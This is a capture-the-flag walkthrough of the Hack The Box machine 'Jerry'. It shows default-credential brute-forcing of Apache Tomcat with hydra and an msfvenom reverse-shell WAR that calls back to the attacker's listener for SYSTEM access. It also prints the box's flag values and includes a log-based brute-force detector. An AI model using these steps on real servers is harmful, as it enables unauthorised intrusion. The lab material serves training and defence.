
Jerry

Machine Name   Level   OS
Jerry - HTB    Easy    Windows

Walkthrough

Let's start with an nmap scan.


PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /examples/: Sample scripts
|   /manager/html/upload: Apache Tomcat (401 Unauthorized)
|   /manager/html: Apache Tomcat (401 Unauthorized)
|_  /docs/: Potentially interesting folder
|_http-server-header: Apache-Coyote/1.1
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)

The gobuster scan turned up nothing. After that I decided to try the default credentials for Tomcat. I downloaded the usernames and passwords from https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt and wrote a small Python script to reformat the wordlist.

┌──(root💀kali)-[~/oscp/htb/Jerry]
└─# cat create.py 
# Read the user:pass list and split it into one file of usernames and one of passwords
with open("tomcat-betterdefaultpasslist.txt") as dosya:
    wordlist = dosya.read().split("\n")

username = []
password = []

for i in wordlist:
    # Skip blank lines and lines without a separator before appending anything,
    # otherwise the username list gets an extra entry and the two lists drift apart.
    # Split on the first ':' only so passwords containing ':' stay intact.
    if ":" not in i:
        continue
    user, pwd = i.split(":", 1)
    username.append(user)
    password.append(pwd)

# Write with "w" rather than "a" so re-running the script does not duplicate entries
with open("username", "w") as dosya:
    for i in username:
        dosya.write(i + "\n")

with open("password", "w") as dosya:
    for i in password:
        dosya.write(i + "\n")

Now let's try them with hydra.

┌──(root💀kali)-[~/oscp/htb/Jerry]
└─# hydra -L username -P password  10.10.10.95 -s 8080 http-get /host-manager/html
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-03 08:27:41
[DATA] max 16 tasks per 1 server, overall 16 tasks, 6240 login tries (l:80/p:78), ~390 tries per task
[DATA] attacking http-get://10.10.10.95:8080/host-manager/html
[8080][http-get] host: 10.10.10.95   login: admin   password: admin
[8080][http-get] host: 10.10.10.95   login: admin   password: admin
[8080][http-get] host: 10.10.10.95   login: admin   password: admin
[STATUS] 2627.00 tries/min, 2627 tries in 00:01h, 3613 to do in 00:02h, 16 active
[STATUS] 2106.00 tries/min, 4212 tries in 00:02h, 2028 to do in 00:01h, 16 active
[8080][http-get] host: 10.10.10.95   login: tomcat   password: s3cret
[8080][http-get] host: 10.10.10.95   login: tomcat   password: s3cret
1 of 1 target successfully completed, 5 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-03 08:30:36

We identified two accounts. When I logged in as admin:admin my privileges were limited, but when I logged in as tomcat:s3cret I was able to upload files.
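From the defender's side, a brute force like the one above leaves a clear trail in Tomcat's access log: a burst of 401 responses for /host-manager/html or /manager/html from one source, followed by a 2xx once a password works. The detector below is an added example and not part of the original walkthrough; the log lines are constructed in Tomcat's default AccessLogValve common pattern, and the watched path prefixes, threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in Tomcat's default AccessLogValve "common" pattern
# (%h %l %u %t "%r" %s %b). Not a real capture; addresses are the walkthrough's.
SAMPLE_LOG = """\
10.10.14.15 - - [03/Aug/2021:08:27:41 +0000] "GET /host-manager/html HTTP/1.0" 401 2473
10.10.14.15 - - [03/Aug/2021:08:27:41 +0000] "GET /host-manager/html HTTP/1.0" 401 2473
10.10.14.15 - - [03/Aug/2021:08:27:42 +0000] "GET /host-manager/html HTTP/1.0" 401 2473
10.10.14.15 - tomcat [03/Aug/2021:08:30:35 +0000] "GET /host-manager/html HTTP/1.0" 200 19372
10.10.14.15 - tomcat [03/Aug/2021:08:31:02 +0000] "GET /manager/html/list HTTP/1.1" 200 15384
192.168.1.20 - - [03/Aug/2021:08:29:00 +0000] "GET /docs/ HTTP/1.1" 200 6731
"""
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)
MANAGER_PREFIXES = ("/manager/", "/host-manager/")  # assumed paths to watch

def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None  # line is not in the common format
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    d["status"] = int(d["status"])
    return d

def detect(log_text, threshold=3, window=timedelta(minutes=5)):
    """ip -> (401 count, user of first later 2xx or None) for IPs with >= threshold 401s in window."""
    failures = defaultdict(list)   # ip -> timestamps of 401s on manager paths
    success = {}                   # ip -> authenticated user of first 2xx after failures
    for line in log_text.splitlines():
        ev = parse(line)
        if not ev or not ev["path"].startswith(MANAGER_PREFIXES):
            continue
        if ev["status"] == 401:
            failures[ev["ip"]].append(ev["ts"])
        elif 200 <= ev["status"] < 300 and ev["ip"] in failures:
            success.setdefault(ev["ip"], ev["user"])
    alerts = {}
    for ip, times in failures.items():
        times.sort()
        for i in range(len(times) - threshold + 1):  # any threshold consecutive 401s inside window
            if times[i + threshold - 1] - times[i] <= window:
                alerts[ip] = (len(times), success.get(ip))
                break
    return alerts
```

A source that trips the threshold and then gets a 2xx on a manager path is the case to act on first: the credential guessing succeeded and the manager application can deploy code.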

Let's create a WAR file right away.

┌──(root💀kali)-[~/oscp/htb/Jerry]
└─# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f war > shell.war

Payload size: 1086 bytes
Final size of war file: 1086 bytes

I uploaded the file through http://10.10.10.95:8080/manager/html/list and then got a reverse shell by visiting http://10.10.10.95:8080/shell/

┌──(root💀kali)-[~/oscp/htb/Jerry]
└─# nc -lvp 4444  
listening on [any] 4444 ...
10.10.10.95: inverse host lookup failed: Unknown host
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

Let's read the flags.

C:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  27,576,569,856 bytes free

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e
Category: Tomcat, Walkthrough, Windows
